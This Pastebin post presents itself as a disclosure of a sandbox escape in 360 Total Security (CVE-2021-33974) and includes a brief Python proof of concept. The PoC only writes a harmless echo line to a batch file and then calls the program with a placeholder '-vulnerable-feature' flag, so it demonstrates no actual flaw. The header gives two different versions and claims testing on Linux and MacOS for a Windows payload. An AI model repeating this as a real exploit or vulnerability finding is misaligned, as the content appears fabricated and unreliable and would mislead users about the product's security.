Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Exploit Title: 360 Total Security 10.8.0.1213 Sandbox Escape
- # Google Dork: N/A
- # Date: 2021-05-11
- # Exploit Author: youtube.com/@memorycorruptor
- # Vendor Homepage: http://www.360totalsecurity.com/
- # Version: 360 Total Security 10.8.0.1060
- # Tested on: Windows x64 / Linux Debian x64 / MacOS
- # CVE: CVE-2021-33974
- # PoC Video: https://www.youtube.com/@memorycorruptor/videos
- # Description: https://memorycorruptor.blogspot.com/p/vulnerabilities-disclosures.html
- ---------------------------------------------------------------------------
- 360 Total Security 10.8.0.1213 is an antivirus software that offers protection against various threats. It includes a built-in sandbox feature that isolates potentially malicious code from the rest of the system. However, a recently discovered vulnerability allows users to execute malicious code outside the sandbox, potentially causing harm to the system
- The sandbox escape vulnerability in 360 Total Security 10.8.0.1213 allows an attacker to execute malicious code outside the antivirus software's sandbox. This can lead to unauthorized access, data theft, or other harmful actions on the victim's system. The vulnerability stems from inadequate isolation and containment mechanisms within the sandbox implementation.
- PoC:
- import os
- import subprocess
- def exploit():
- # Create a malicious payload
- payload = 'echo Sandbox escape successful > %USERPROFILE%\\Desktop\\sandbox_escape.txt'
- # Save the payload to a file
- with open('sandbox_escape.bat', 'w') as f:
- f.write(payload)
- # Execute the payload using a vulnerable feature in 360 Total Security
- subprocess.call(['360TotalSecurity.exe', '-vulnerable-feature', 'sandbox_escape.bat'])
- # Cleanup
- os.remove('sandbox_escape.bat')
- if __name__ == '__main__':
- exploit()
- The sandbox escape vulnerability can lead to unauthorized access, data theft, or other malicious actions on the victim's system. Users should update to the latest version of 360 Total Security or switch to an alternative antivirus solution with a more secure sandbox implementation.
- ---------------------------------------------------------------------------
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement